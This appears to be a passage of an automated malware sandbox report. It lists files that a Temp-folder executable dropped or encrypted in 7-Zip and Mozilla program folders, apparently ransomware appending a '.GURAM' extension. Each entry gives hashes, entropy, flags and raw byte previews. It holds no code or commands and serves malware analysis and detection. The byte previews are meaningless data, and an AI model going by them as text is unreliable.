                                                                                                                                                                                                                                                Preview:"K..r..R..W.....#.c.S....L}.c.y.<........=...6..@...H!.n.tDV.N.G.......j.S.*.h.....y......2`W...&K.,...?{y..F.| 4.8"zU..q..]v;7{1.Yy...*...n..I_.}.;q(Pn..y.Dl}s.j.b.-..:..>...:.....-...o......#..?.9..U+xXpq......~...wH.......BI[S..jR..s..w_}A.....=H.!6h.?i.F.|.H............#^].B....*.E..s....+...6.v.P.^.8....v..."(...w....D._...q.+..7.......A.4..)......*xY_.... x+..Rw.T....7xf.=......S...Le)^L.....y.Z7=.j@....F..JBj. ..+z..OL.0q..C.............e..'.\t.........@.[*%.....^..I..J.Q.U..m..."x.].1n.......M.I.4_u......"..K-5{.I...S..)..V%.)7=J.aS......_(....!.....v.=......w..ex....*.8..H.X.*K...g..<./...,a9b..Z...V ......x.6...0..-Q.C.',......G..E....=A...=..s..F..R....;..]..w....I........P^..~I.u./......6.I..,.u.z..i%U...WES.+.U^...0j..`w....t..r...`.....C_......q..u*...a....vM.{...M|`...*"...~...U:oUv..yca.....W...@.rc.qj.c.qg......o.6P...T.-.......c...|........-.r.....m......0|...+X).dW~v....#^.w.......E.......^.."......!cw.Kj...

                                                                                                                                                                                                                                                C:\Program Files (x86)\mozilla maintenance service\updater.ini.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1810
                                                                                                                                                                                                                                                Entropy (8bit):7.894808169244127
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:VOamYerUB263/1UwbMSpyRaxvS0korL4o0jZtwV/:VV/KReJrQleV/
                                                                                                                                                                                                                                                MD5:172CD05C59F506978AEEF39AA39D7B11
                                                                                                                                                                                                                                                SHA1:56E39A2C4B3FF52AE1199F87D871F537DDC85A08
                                                                                                                                                                                                                                                SHA-256:4E11F0FAD3CB12C2CB6C2D10F91BABD246A86845DA00EDED6116B4602A6AC814
                                                                                                                                                                                                                                                SHA-512:F537D6712737121F809119976764CBC8AA8302F9D93492247BB9795904A511525FC3393EB4F777F4A9FC46C2C18E3B2139218EC15A066FE3402805E220C6A267
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...vVT.....^.M...}'....$E.......9\...%_n.#.7......$Q.Rt..O".......n.P'-../......P.........e.7..{.2....}K.y;I....4......*..f.{C........2yG.Nq..b.B29.a.:.n.2.Yb...&....A.2.{-..J...(.....o&eyN.~...I8=I~[...6.7...^".Q..J`tz'v.k@....>.R.1..t0....A.Z,.m.s.WV...W..?.RNmd...]...F.Ch../...xD{.7..Xxe=.I 3..5..>..yx.^w.w..j.o.l.1.......p.;.J...Y.v.a..A...|b.R^.wfh..~2.0..2{_..`......>p'e.....g..I..Q)...!...Hq..[."..........9.z.~F2t...].7....}PAf...uv.'....|q..&...!..L.....0.8..>.g.....2<.....)..).$........s...n6uq..!..'.......o....Gf.NC..nn x...nC..VR.b+.M.6..H\.#.8}...7...!...Z.....7u.....(..7#:.xr.....f`r....".y..~.......Dv....w6?p.m.%.q..E.:.....@..!G2..C .a...*.mPT|..o..0.$...th.A..z.z.w_....e.!......i.Dr...d.....#.~m.1......Bwl..&i...M....m..^7..[...[LE.-..D....c..a.E.s......2...C....k>/R.......1...:G..4.#h.E.4e.z..{.|.?..I.!L_..E_.....5#N<...am......... k.........nZ...1..}...r,C...[......3...Vn.....7 .=@.+h..'.yx.(../...X.BJ.L.&.[..As...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip.chm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115908
                                                                                                                                                                                                                                                Entropy (8bit):7.998314312645867
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:Na/lxpIB51eloXu27ja3qjEZY8B6BTW0LWY788CyjnpjzYeokOg88ODMRp13bVby:NaPqbXuSbIY8BaPi25pjRaGRbVTNqYi
                                                                                                                                                                                                                                                MD5:07920B70B98959409B031AA2E39076AC
                                                                                                                                                                                                                                                SHA1:434A073C59DCD131645FEFA3813DB8712F408074
                                                                                                                                                                                                                                                SHA-256:BF3A8841A77B4030D17C81091812AD2E3E85379383EE68F002AE0C85158322E8
                                                                                                                                                                                                                                                SHA-512:6EC0EFE0CB3A52069F486D02F2AA542D92AA2802D9E7BDF321E513AD5CA39234470C459BCA5910AF24095010C106DDED4F1AACA90D117DFE29455398A7643758
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:988?.?....8....A.V.........M...;I,.m.f...}.M.k..W.`..k..n.1.Nc..=Dy.a..0.X..]I..q?#:..ei3..hR.9..z..S*..2._...F>......[I...5.0<B..W...o.......i}.(........{...v.......d<..JCgC...k2....?U?....h4$.&.a7..=a....(..J..@.S..[ao..[.....D\.r...u..A../.....~.~.V.(-....K....P...wf.~O=;8..WRy|.(...6!....Vz.{64....t....^=.=#...8.d.B........r..L9.".61..S.u...HG;AT+..M.0p......~.@:n...E.M:.?Fr$.yB..P...g..u..R.D..+p...gf.....9.w..8!T.I.us.l.<Kg.E~oH..Z..8..(.=..9r..Y......-R.I......*...yCB....y.C....=.Yj...c...,...s6z.......:....P......4.Y.n.}...#o..r.E.`\.t..z`Q.;.....u....rB..=i.y..#...#.q}n....i..J..gL..s.y2...8N..'.}n..o.z.V.;...".......x..;1u...v...7.....`..|...2;oWEk.7FBdI.('.x.x/OM..-29..n....b.....lI..|...... ..KjM....V[...{)...1.!.R...w........\....5...6.........c5.d.UxW..#.M.3y.{(.U.a...7.........5RW../....S.%(.."..... .4..Ji..9@.n{..,..Ts.c...'..BQjrl4.}....|.P..t...0...m ..G...B2,....Ly......x0....;...4)>.D..7.L^O.............[&.)........2.f..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip.chm.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115908
                                                                                                                                                                                                                                                Entropy (8bit):7.998314312645867
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:Na/lxpIB51eloXu27ja3qjEZY8B6BTW0LWY788CyjnpjzYeokOg88ODMRp13bVby:NaPqbXuSbIY8BaPi25pjRaGRbVTNqYi
                                                                                                                                                                                                                                                MD5:07920B70B98959409B031AA2E39076AC
                                                                                                                                                                                                                                                SHA1:434A073C59DCD131645FEFA3813DB8712F408074
                                                                                                                                                                                                                                                SHA-256:BF3A8841A77B4030D17C81091812AD2E3E85379383EE68F002AE0C85158322E8
                                                                                                                                                                                                                                                SHA-512:6EC0EFE0CB3A52069F486D02F2AA542D92AA2802D9E7BDF321E513AD5CA39234470C459BCA5910AF24095010C106DDED4F1AACA90D117DFE29455398A7643758
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:988?.?....8....A.V.........M...;I,.m.f...}.M.k..W.`..k..n.1.Nc..=Dy.a..0.X..]I..q?#:..ei3..hR.9..z..S*..2._...F>......[I...5.0<B..W...o.......i}.(........{...v.......d<..JCgC...k2....?U?....h4$.&.a7..=a....(..J..@.S..[ao..[.....D\.r...u..A../.....~.~.V.(-....K....P...wf.~O=;8..WRy|.(...6!....Vz.{64....t....^=.=#...8.d.B........r..L9.".61..S.u...HG;AT+..M.0p......~.@:n...E.M:.?Fr$.yB..P...g..u..R.D..+p...gf.....9.w..8!T.I.us.l.<Kg.E~oH..Z..8..(.=..9r..Y......-R.I......*...yCB....y.C....=.Yj...c...,...s6z.......:....P......4.Y.n.}...#o..r.E.`\.t..z`Q.;.....u....rB..=i.y..#...#.q}n....i..J..gL..s.y2...8N..'.}n..o.z.V.;...".......x..;1u...v...7.....`..|...2;oWEk.7FBdI.('.x.x/OM..-29..n....b.....lI..|...... ..KjM....V[...{)...1.!.R...w........\....5...6.........c5.d.UxW..#.M.3y.{(.U.a...7.........5RW../....S.%(.."..... .4..Ji..9@.n{..,..Ts.c...'..BQjrl4.}....|.P..t...0...m ..G...B2,....Ly......x0....;...4)>.D..7.L^O.............[&.)........2.f..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):101984
                                                                                                                                                                                                                                                Entropy (8bit):7.99832003498781
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:6365MxhvUljAy/xlG9daJhzXHFw7je3t5afk:B4qjdm9uz3Fw7jcrqk
                                                                                                                                                                                                                                                MD5:9D20444DF78C6D8707BCF397BFC7A8B3
                                                                                                                                                                                                                                                SHA1:320FC5ED715AE4B45D2C07E0F555F8BD44B0D3DD
                                                                                                                                                                                                                                                SHA-256:080B78765C8C8305571FABDE18824A66DF0FEE6ACA4DF449E957C5902FBDE227
                                                                                                                                                                                                                                                SHA-512:A4FB4C973FBF5344234F1F36437793CA3A24B3DD175E8A43348198426308DD7190A698AB21115EA3D3530E56497DD6FACEEAEEA2CCC15E7DB71E200A38E166A9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.A...?....}.K..eU.*..[?>...+z._..a.m6....J.(..{s....7.3..c...+..1.-..+.].pY.F.dr...H..u...c5..Oz.MSG..K.h........L..Z.G]O.....T.T.)B.X..94[..2.a....mM..8s.._..#DJ.UnK|.h..G.[.1!."..!...\..2.......&O...u.*......r....\V1.X..u.V......K....X....t......p...h..|?.T.....MY..q...~L..G..6Z..n.0~.5xX.+%...I=3.od.4..v*+...H.......n.N^.....4.K..{J.....j....x.0m0j.46/.-.....M7,/.L........Y.......5.e....\..........PD.....d....t...R..E..qp..\u0.......@...Kgy.D$<-.8q.t..j...)..^/.M.....|H.&.........m...N.......m..V..dE.....,X...K1.;..@..^R....j......yS..5z.].....$.D.].#d...d.7;x1.~x.../C.M.;.../....08D..-.Dz....3..f.$..s......~._.Q.*dmD...f..J4x....L...g...>]...#.......{..w.j..J#.gb..y)*..b.o.lIN.#.....~...H..M.4B.k....,.4Q\.x..0E80....$h3l..../a^x.v.o"|...Q<.....D... >/v.62.A".. . ..X4...!1C.@ ..).8.^,8.@3..=.... f.wz.....k.H....sX'S.^..?..r...{..$..\}.+....<.V.$..+.Gu......l.......`.+`,........YX...0...#@#..p......uk5_.j..X..>q..z ..,_)`.#...5

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):101984
                                                                                                                                                                                                                                                Entropy (8bit):7.99832003498781
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:6365MxhvUljAy/xlG9daJhzXHFw7je3t5afk:B4qjdm9uz3Fw7jcrqk
                                                                                                                                                                                                                                                MD5:9D20444DF78C6D8707BCF397BFC7A8B3
                                                                                                                                                                                                                                                SHA1:320FC5ED715AE4B45D2C07E0F555F8BD44B0D3DD
                                                                                                                                                                                                                                                SHA-256:080B78765C8C8305571FABDE18824A66DF0FEE6ACA4DF449E957C5902FBDE227
                                                                                                                                                                                                                                                SHA-512:A4FB4C973FBF5344234F1F36437793CA3A24B3DD175E8A43348198426308DD7190A698AB21115EA3D3530E56497DD6FACEEAEEA2CCC15E7DB71E200A38E166A9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.A...?....}.K..eU.*..[?>...+z._..a.m6....J.(..{s....7.3..c...+..1.-..+.].pY.F.dr...H..u...c5..Oz.MSG..K.h........L..Z.G]O.....T.T.)B.X..94[..2.a....mM..8s.._..#DJ.UnK|.h..G.[.1!."..!...\..2.......&O...u.*......r....\V1.X..u.V......K....X....t......p...h..|?.T.....MY..q...~L..G..6Z..n.0~.5xX.+%...I=3.od.4..v*+...H.......n.N^.....4.K..{J.....j....x.0m0j.46/.-.....M7,/.L........Y.......5.e....\..........PD.....d....t...R..E..qp..\u0.......@...Kgy.D$<-.8q.t..j...)..^/.M.....|H.&.........m...N.......m..V..dE.....,X...K1.;..@..^R....j......yS..5z.].....$.D.].#d...d.7;x1.~x.../C.M.;.../....08D..-.Dz....3..f.$..s......~._.Q.*dmD...f..J4x....L...g...>]...#.......{..w.j..J#.gb..y)*..b.o.lIN.#.....~...H..M.4B.k....,.4Q\.x..0E80....$h3l..../a^x.v.o"|...Q<.....D... >/v.62.A".. . ..X4...!1C.@ ..).8.^,8.@3..=.... f.wz.....k.H....sX'S.^..?..r...{..$..\}.+....<.V.$..+.Gu......l.......`.+`,........YX...0...#@#..p......uk5_.j..X..>q..z ..,_)`.#...5

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip32.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):67168
                                                                                                                                                                                                                                                Entropy (8bit):7.996563297311679
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:qHWXOzienbY9n1CVE/jQ4FDp987MF4z4d0I/7Xo:jXOJn2n1Cq/842uA20SY
                                                                                                                                                                                                                                                MD5:963CB5E8186E1F08ADD53B003B483958
                                                                                                                                                                                                                                                SHA1:A07BA90ED6C6F49A0D07443884AB0B15B25F9A87
                                                                                                                                                                                                                                                SHA-256:196C8E226D1EBF4367955B012F7CFDBACEA670757AA3AADCB6E006A3371CDEB3
                                                                                                                                                                                                                                                SHA-512:747BC758C14EAF8B61D1D11B67CB7DBD5D754E0609E76E6BEC01CB0188D674D2325338A846E7EF323CE8FA42115503D52563D7B0979FF8EB09530D0E886F2361
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:@..VP.K.KKs.dT..Q.R.."Xk...m.?-..Q..W..z...f{;.]f....l9....3."%=..\..Y.^]5.je..Msp..5{E.F.../.<opqo..7q-.*..i*......_U.d._..).Q:...Xq;..XCIm...4X../.. A.I....HV......w}Lt..u?...^........8.:ua..#..`f3}.$......".}Q_....>.;.b...b.N8.74m..Q.13.;.<+I....kxm.<$.L.C....l...B.(.....7..,V..Qo&.!.P..h29...!.??n=.[\|.%.!)...JYR...BQz..".&.{a..B.2.L..r.Cb...y...p.....s._..v/Mb.%. ..... ......X.!.)[.Z.^...g..3...W.....1.c?..o.jT...Hu....H.L..Gr......FI/uc>s..O..N..5..|...A....$....Z...o.{,.';..k.N.h..[.>.~.q.._..RFw..g.p.4.3E..TS.........;.........Y...n.V.|.....qk.e.N.....U..O..q#e.n..k.s.e...!.......K.....l.....#N.;.?.t..<17!+MAM|p.......M..$.WVl.....d.l}..~,.^.....V..A..&%.Z...C&c.. ..'.Nz.Z...o..x..g..pL.>..2.....2.J..z..N....@..G.6.....K.i`I>[.....v<,...H.6~)..&h....kQ".F....$.N....<:...l.....?}..B....s.m..XSh.j.DQ.z........j....(8.....X...4..*...C1A..H.e.Ky=......-...W<`......<....j....h.J....L...I...Z..p...WL..%.|...6y.....J..W.EKx.6....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7-zip32.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):67168
                                                                                                                                                                                                                                                Entropy (8bit):7.996563297311679
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:qHWXOzienbY9n1CVE/jQ4FDp987MF4z4d0I/7Xo:jXOJn2n1Cq/842uA20SY
                                                                                                                                                                                                                                                MD5:963CB5E8186E1F08ADD53B003B483958
                                                                                                                                                                                                                                                SHA1:A07BA90ED6C6F49A0D07443884AB0B15B25F9A87
                                                                                                                                                                                                                                                SHA-256:196C8E226D1EBF4367955B012F7CFDBACEA670757AA3AADCB6E006A3371CDEB3
                                                                                                                                                                                                                                                SHA-512:747BC758C14EAF8B61D1D11B67CB7DBD5D754E0609E76E6BEC01CB0188D674D2325338A846E7EF323CE8FA42115503D52563D7B0979FF8EB09530D0E886F2361
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:@..VP.K.KKs.dT..Q.R.."Xk...m.?-..Q..W..z...f{;.]f....l9....3."%=..\..Y.^]5.je..Msp..5{E.F.../.<opqo..7q-.*..i*......_U.d._..).Q:...Xq;..XCIm...4X../.. A.I....HV......w}Lt..u?...^........8.:ua..#..`f3}.$......".}Q_....>.;.b...b.N8.74m..Q.13.;.<+I....kxm.<$.L.C....l...B.(.....7..,V..Qo&.!.P..h29...!.??n=.[\|.%.!)...JYR...BQz..".&.{a..B.2.L..r.Cb...y...p.....s._..v/Mb.%. ..... ......X.!.)[.Z.^...g..3...W.....1.c?..o.jT...Hu....H.L..Gr......FI/uc>s..O..N..5..|...A....$....Z...o.{,.';..k.N.h..[.>.~.q.._..RFw..g.p.4.3E..TS.........;.........Y...n.V.|.....qk.e.N.....U..O..q#e.n..k.s.e...!.......K.....l.....#N.;.?.t..<17!+MAM|p.......M..$.WVl.....d.l}..~,.^.....V..A..&%.Z...C&c.. ..'.Nz.Z...o..x..g..pL.>..2.....2.J..z..N....@..G.6.....K.i`I>[.....v<,...H.6~)..&h....kQ".F....$.N....<:...l.....?}..B....s.m..XSh.j.DQ.z........j....(8.....X...4..*...C1A..H.e.Ky=......-...W<`......<....j....h.J....L...I...Z..p...WL..%.|...6y.....J..W.EKx.6....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1842272
                                                                                                                                                                                                                                                Entropy (8bit):6.814846148311817
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:b66fAdxKHplfu94i55tbhrA3KBTf73CCEnWaT1yozGUIjnRnUv:bhfdQ94iZNrA363t0T1yyIjnRnUv
                                                                                                                                                                                                                                                MD5:B9CE340CEC614172657460DD831219A1
                                                                                                                                                                                                                                                SHA1:81BD48C755107DBD7DF28171185BF4CE82C95E80
                                                                                                                                                                                                                                                SHA-256:59893D48BF17549E00EE5E836844DAFAE8BB4F7CED41FF48ACBC124EDE79849A
                                                                                                                                                                                                                                                SHA-512:51A92BB0C82164397661D5946E850C025340077EA524740B8E598378C090EA19529BFD722C7B678766FDFA6F4EEC10FE470D9616FC08172FFA0A950B2FC8B036
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..k..H..D............l.?...f.....Ew./..p.CC......e....28Q`..9.u.G{%...t..fy.*J.6....)......x,O|.,>. ..e.a..^m...wD~...F.6.....t}=Y.n....iR.......f..<1.d..D@......]BV5.5........B7. ...|V.1G.Y<j.HGM.C.X.....j....|N... PQA..O...j.p..rv.\......F.2&A...+t..F.$...$.......?...;....g>@..!....\.t.;..Mc.}....M......W.5.....{c.S;....hY..2}.e..;.dw.....^.lZ./.).\...x..!........Bl&..j=]./).Hz....<4.............U....B...9...'.\.)Td..M8..A1j[<.h*....[c.....B.E..m/2.0pA..xe...=38L.?..W.v...`...8........E...I.*..<\..o.F.G..ig..**.q....._..e..;.-o.xZi...]b..0p%!W.....U....@....6..`@U.......r4..i..#.=...1..W.....y...r..a......j"..]..bD.dL..:...z.....8.Ce....+.b&.^)..D.a..r...N.m.}....y=........{Mp..x....A....)B....-..XA..KIo.J.,6...tX.p.y....!i.../..$..3.Pk. e.CD. .r.....(..|.............:....b..Vkg.z.whK>.!M.....f..].......Q......H.Hi..:9.J.....c x....,.3...8.......e.?nUo...].....v_bi...'LE.r(.0R.H..p..<.5..R!.W...9.M.^..IH...\..nG.....:T.w..,..g

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1842272
                                                                                                                                                                                                                                                Entropy (8bit):6.814846148311817
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:b66fAdxKHplfu94i55tbhrA3KBTf73CCEnWaT1yozGUIjnRnUv:bhfdQ94iZNrA363t0T1yyIjnRnUv
                                                                                                                                                                                                                                                MD5:B9CE340CEC614172657460DD831219A1
                                                                                                                                                                                                                                                SHA1:81BD48C755107DBD7DF28171185BF4CE82C95E80
                                                                                                                                                                                                                                                SHA-256:59893D48BF17549E00EE5E836844DAFAE8BB4F7CED41FF48ACBC124EDE79849A
                                                                                                                                                                                                                                                SHA-512:51A92BB0C82164397661D5946E850C025340077EA524740B8E598378C090EA19529BFD722C7B678766FDFA6F4EEC10FE470D9616FC08172FFA0A950B2FC8B036
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..k..H..D............l.?...f.....Ew./..p.CC......e....28Q`..9.u.G{%...t..fy.*J.6....)......x,O|.,>. ..e.a..^m...wD~...F.6.....t}=Y.n....iR.......f..<1.d..D@......]BV5.5........B7. ...|V.1G.Y<j.HGM.C.X.....j....|N... PQA..O...j.p..rv.\......F.2&A...+t..F.$...$.......?...;....g>@..!....\.t.;..Mc.}....M......W.5.....{c.S;....hY..2}.e..;.dw.....^.lZ./.).\...x..!........Bl&..j=]./).Hz....<4.............U....B...9...'.\.)Td..M8..A1j[<.h*....[c.....B.E..m/2.0pA..xe...=38L.?..W.v...`...8........E...I.*..<\..o.F.G..ig..**.q....._..e..;.-o.xZi...]b..0p%!W.....U....@....6..`@U.......r4..i..#.=...1..W.....y...r..a......j"..]..bD.dL..:...z.....8.Ce....+.b&.^)..D.a..r...N.m.}....y=........{Mp..x....A....)B....-..XA..KIo.J.,6...tX.p.y....!i.../..$..3.Pk. e.CD. .r.....(..|.............:....b..Vkg.z.whK>.!M.....f..].......Q......H.Hi..:9.J.....c x....,.3...8.......e.?nUo...].....v_bi...'LE.r(.0R.H..p..<.5..R!.W...9.M.^..IH...\..nG.....:T.w..,..g

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):557664
                                                                                                                                                                                                                                                Entropy (8bit):7.492999106762403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:GAQrEd8UDm2g7XO3LWUYEc1njP53wSOy7lrin:G6yykEi113wc7lrg
                                                                                                                                                                                                                                                MD5:9B97079A6D1B5CF8EE6988783441C640
                                                                                                                                                                                                                                                SHA1:3CEB1A9BFDA3E7DFBD85D0304E416FE555B150C4
                                                                                                                                                                                                                                                SHA-256:4BB0D77AB6D27BBC7B77E0C681332E343AFCD9FE5725D63EBC2DEA025D367373
                                                                                                                                                                                                                                                SHA-512:BC902105EA87EFABCBC4EA03F38B37D146E21F51211DE7E1CC19353FD855E155857C0AA11E855FBDCEEF4B8A0AB4DB8D3407B785DC6CCE3EF358BCD33226A3B3
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.%%.?.. .Q..R..7>.Fu.v....|...1..:.........qp.|.."..DL..8.H9K..PgX..L.j...sn..i.g..........5)..........|oLt.k3..h...4.Xs+u..N...8"mB.#..(...#..3..z.. x`..K...,...".....%R5.m....."9..fo..L.K.....WA...0D...7........L...8....zh.......l8....&D...........].j|....%......<"W.(."....xC..!...3>.A.p@.3..b8..l.R....k@.S...J..;.%.".Q...T....t7......]}"O....eTf.t.k......x.......>.HP..;7V.j&.....~....l.DV.90r:.......y.ukN0t#JfD.%..>..K.g.\..?q..^.1..P...m.s.l.^O.0.s.7L"..^..C?....;.. ..$._y.>...y...=Duoi..&]VX.5@`......_5......B.Dc....|.`8.......?.[z...Y6.s..Q.;...eM.7J...|P...%R<}..3M.w..`.,%:.c.I...1.ON.....-pUT.[.~....~p.n9{.WR....P.E..wU...U...{d...<`R.Y{...,....[.9 ..f......z.U+.~WiEQ_Mf...|X.9fL'.kI...Z.N7..T97...A..?).3.VU..2.]...%R.)...*....[?R.z...-..2.._ ...F.....zM..m..4@PG...4.^...>..M.......g.Y|............F...kOR..Q!..g..y.u.....t..J..D..r..4.....i.X....Vg.....B..hE..o...,.o...l...l*.......J.U..n_...m.2U.....xC....[.."..f...),Z.G.......V..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):557664
                                                                                                                                                                                                                                                Entropy (8bit):7.492999106762403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:GAQrEd8UDm2g7XO3LWUYEc1njP53wSOy7lrin:G6yykEi113wc7lrg
                                                                                                                                                                                                                                                MD5:9B97079A6D1B5CF8EE6988783441C640
                                                                                                                                                                                                                                                SHA1:3CEB1A9BFDA3E7DFBD85D0304E416FE555B150C4
                                                                                                                                                                                                                                                SHA-256:4BB0D77AB6D27BBC7B77E0C681332E343AFCD9FE5725D63EBC2DEA025D367373
                                                                                                                                                                                                                                                SHA-512:BC902105EA87EFABCBC4EA03F38B37D146E21F51211DE7E1CC19353FD855E155857C0AA11E855FBDCEEF4B8A0AB4DB8D3407B785DC6CCE3EF358BCD33226A3B3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.%%.?.. .Q..R..7>.Fu.v....|...1..:.........qp.|.."..DL..8.H9K..PgX..L.j...sn..i.g..........5)..........|oLt.k3..h...4.Xs+u..N...8"mB.#..(...#..3..z.. x`..K...,...".....%R5.m....."9..fo..L.K.....WA...0D...7........L...8....zh.......l8....&D...........].j|....%......<"W.(."....xC..!...3>.A.p@.3..b8..l.R....k@.S...J..;.%.".Q...T....t7......]}"O....eTf.t.k......x.......>.HP..;7V.j&.....~....l.DV.90r:.......y.ukN0t#JfD.%..>..K.g.\..?q..^.1..P...m.s.l.^O.0.s.7L"..^..C?....;.. ..$._y.>...y...=Duoi..&]VX.5@`......_5......B.Dc....|.`8.......?.[z...Y6.s..Q.;...eM.7J...|P...%R<}..3M.w..`.,%:.c.I...1.ON.....-pUT.[.~....~p.n9{.WR....P.E..wU...U...{d...<`R.Y{...,....[.9 ..f......z.U+.~WiEQ_Mf...|X.9fL'.kI...Z.N7..T97...A..?).3.VU..2.]...%R.)...*....[?R.z...-..2.._ ...F.....zM..m..4@PG...4.^...>..M.......g.Y|............F...kOR..Q!..g..y.u.....t..J..D..r..4.....i.X....Vg.....B..hE..o...,.o...l...l*.......J.U..n_...m.2U.....xC....[.."..f...),Z.G.......V..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.sfx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):215136
